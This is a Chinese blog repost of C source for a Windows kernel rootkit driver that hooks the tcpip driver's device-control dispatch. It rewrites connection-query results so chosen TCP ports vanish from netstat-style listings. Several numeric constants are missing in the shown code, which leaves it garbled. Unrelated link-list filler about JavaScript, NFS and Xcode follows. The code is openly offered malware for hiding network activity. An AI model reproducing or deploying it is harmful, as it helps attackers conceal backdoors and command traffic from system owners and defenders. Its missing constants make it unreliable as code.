隐藏tcp端口,来自看雪

///////////////////////////////////////////////////////////////////////////////////////

// Filename Rootkit.c

//

// Author: Jamie Butler

// Email:  james.butler@hbgary.com or butlerjr@acm.org

//

// Description: This is where the work gets done.

//

// Version: 1.0

// 

#include "ntddk.h"

#include "tdiinfo.h"

//#include "stdio.h"

//#include "stdlib.h"

#include "Rootkit.h"

NTSTATUS DriverEntry(

                   IN PDRIVER_OBJECT  DriverObject,

                   IN PUNICODE_STRING RegistryPath

                    )

{

    NTSTATUS                ntStatus;

    OldIrpMjDeviceControl = NULL;

    DriverObject->DriverUnload = RootkitUnload;

    ntStatus = InstallTCPDriverHook();

    if(!NT_SUCCESS(ntStatus))

        return ntStatus;

    return STATUS_SUCCESS;

}

NTSTATUS InstallTCPDriverHook()

{

    NTSTATUS       ntStatus;

//  UNICODE_STRING deviceNameUnicodeString;

//  UNICODE_STRING deviceLinkUnicodeString;

    UNICODE_STRING deviceTCPUnicodeString;

    WCHAR deviceTCPNameBuffer[]  = L"\\Device\\Tcp";

    pFile_tcp  = NULL;

    pDev_tcp   = NULL;

    pDrv_tcpip = NULL;

    RtlInitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuffer);

    ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA, &pFile_tcp, &pDev_tcp);

    if(!NT_SUCCESS(ntStatus))

    {

        DbgPrint("读取失败!");

        return ntStatus;

    }

    DbgPrint("读取成功!");

    pDrv_tcpip = pDev_tcp->DriverObject;

    OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL];

    if (OldIrpMjDeviceControl)

        InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)HookedDeviceControl);

    return STATUS_SUCCESS;

}

NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)

{

    PIO_STACK_LOCATION      irpStack;

    ULONG                   ioTransferType;

    TDIObjectID             *inputBuffer;

    DWORD                    context;

    //DbgPrint("The current IRP is at %x\n", Irp);

    // Get a pointer to the current location in the Irp. This is where

    // the function codes and parameters are located.

    irpStack = IoGetCurrentIrpStackLocation (Irp);

    switch (irpStack->MajorFunction)

    {

        case IRP_MJ_DEVICE_CONTROL:

            if ((irpStack->MinorFunction == ) && \

                (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))

            {

                ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;

                ioTransferType &= ;

                if (ioTransferType == METHOD_NEITHER) // Need to know the method to find input buffer

                {

                    inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer;

                    // CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDP

                    if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY)

                    {

                        DbgPrint("Input buffer %x\n",inputBuffer);

                        if ((inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110))

                        {

                            // Call our completion routine if IRP successful

                            irpStack->Control = ;

                            irpStack->Control |= SL_INVOKE_ON_SUCCESS; 

                            // Save old completion routine if present

                            irpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool, sizeof(REQINFO));

                            ((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine;

                            ((PREQINFO)irpStack->Context)->ReqType       = inputBuffer->toi_id;

                            // Setup our function to be called on completion of IRP

                            irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;

                        }

                    }

                }

            }

        break;

        default:

        break;

    }

    return OldIrpMjDeviceControl(DeviceObject, Irp);

}

NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject,

                             IN PIRP Irp,

                             IN PVOID Context)

{

    PVOID OutputBuffer;

    DWORD NumOutputBuffers;

    PIO_COMPLETION_ROUTINE p_compRoutine;

    DWORD i;

    // Connection status values:

    // 0 = Invisible

    // 1 = CLOSED

    // 2 = LISTENING

    // 3 = SYN_SENT

    // 4 = SYN_RECEIVED

    // 5 = ESTABLISHED

    // 6 = FIN_WAIT_1

    // 7 = FIN_WAIT_2

    // 8 = CLOSE_WAIT

    // 9 = CLOSING

    // ...

    OutputBuffer = Irp->UserBuffer;

    p_compRoutine = ((PREQINFO)Context)->OldCompletion;

    if (((PREQINFO)Context)->ReqType == 0x101)

    {

        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);

        for(i = ; i < NumOutputBuffers; i++)

        {

            // Hide all Web connections

            if (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == )

                ((PCONNINFO101)OutputBuffer)[i].status = ;

        }

    }

    else if (((PREQINFO)Context)->ReqType == 0x102)

    {

        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);

        for(i = ; i < NumOutputBuffers; i++)

        {

            // Hide all Web connections

            if (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == )

                ((PCONNINFO102)OutputBuffer)[i].status = ;

        }

    }

    else if (((PREQINFO)Context)->ReqType == 0x110)

    {

        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);

        for(i = ; i < NumOutputBuffers; i++)

        {

            // Hide all Web connections

            if (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == )

                ((PCONNINFO110)OutputBuffer)[i].status = ;

        }

    }

    ExFreePool(Context);

    /*

    for(i = 0; i < NumOutputBuffers; i++)

    {

        DbgPrint("Status: %d",OutputBuffer[i].status);

        DbgPrint(" %d.%d.%d.%d:%d",OutputBuffer[i].src_addr & 0xff,OutputBuffer[i].src_addr >> 8 & 0xff, OutputBuffer[i].src_addr >> 16 & 0xff,OutputBuffer[i].src_addr >> 24,HTONS(OutputBuffer[i].src_port));

        DbgPrint(" %d.%d.%d.%d:%d\n",OutputBuffer[i].dst_addr & 0xff,OutputBuffer[i].dst_addr >> 8 & 0xff, OutputBuffer[i].dst_addr >> 16 & 0xff,OutputBuffer[i].dst_addr >> 24,HTONS(OutputBuffer[i].dst_port));

    }*/

    if ((Irp->StackCount > (ULONG)) && (p_compRoutine != NULL))

    {

        return (p_compRoutine)(DeviceObject, Irp, NULL);

    }

    else

    {

        return Irp->IoStatus.Status;

    }

}

NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)

{

    if (OldIrpMjDeviceControl)

        InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)OldIrpMjDeviceControl);

    if (pFile_tcp != NULL)

        ObDereferenceObject(pFile_tcp);

    pFile_tcp = NULL;

    return STATUS_SUCCESS;

}

HideTcpip.c的更多相关文章

随机推荐

  1. js页面重定向跳转代码总结(待续)

    情形一:东八区,浏览器中文跳转 <script type="text/javascript"> var sLang = (navigator.language ? na ...

  2. Easy Populate批量管理下载产品数据为空的解决办法

    把原来的先删除:http://aaaaacom/admin/easypopulate.php?langer=remove

  3. 在RecyclerView中集成QQ汽泡二

    上次已经将GooView集成到RecyclerView当中了[http://www.cnblogs.com/webor2006/p/7787511.html],但是目前还有很多问题,下面先来运行看一下 ...

  4. Lambda方法推导(method references)

    在上一篇[http://www.cnblogs.com/webor2006/p/7707281.html]中提到了方法推导的东东: 这里说细的学习一下它,下面走起! Method references ...

  5. 实际应用脚本备份1——Ubuntu下应用升级脚本与执行方法

    程序自动更新脚本,命名为makefile: build:run run: killall java /webapps/‘应用目录名’/ /webapps/ ‘应用目录名’/ cd /opt/apach ...

  6. calc() 函数

      定义与用法 calc() 函数用于动态计算长度值. 需要注意的是,运算符前后都需要保留一个空格,例如:width: calc(100% - 10px): 任何长度值都可以使用calc()函数进行计 ...

  7. Javascript设计模式之发布-订阅模式

    简介 发布-订阅模式又叫做观察者模式,他定义了一种一对多的依赖关系,即当一个对象的状态发生改变的时候,所有依赖他的对象都会得到通知. 回忆曾经 作为一名前端开发人员,给DOM节点绑定事件可是再频繁不过 ...

  8. Web UI开发推荐!Kendo UI for jQuery自定义小部件——使用MVVM

    Kendo UI for jQuery最新试用版下载 Kendo UI目前最新提供Kendo UI for jQuery.Kendo UI for Angular.Kendo UI Support f ...

  9. Linux 目录共享

    ## 安装 nfs 和 rpc yum install -y nfs-utils rpcbind ## ubuntu 安装 nfs 和 rpc ## apt-get install nfs-kerne ...

  10. xcode打正式包提示缺少icon图标解决方法

    报如下错,是说缺少ipad图标 解决方法 如下图创建图标库 打开新建的图标库文件夹中的contents.josn文件,把下面的代码复制到原来的图标库(可以不进行上一步建图标库,手动添加也可以) 然后把 ...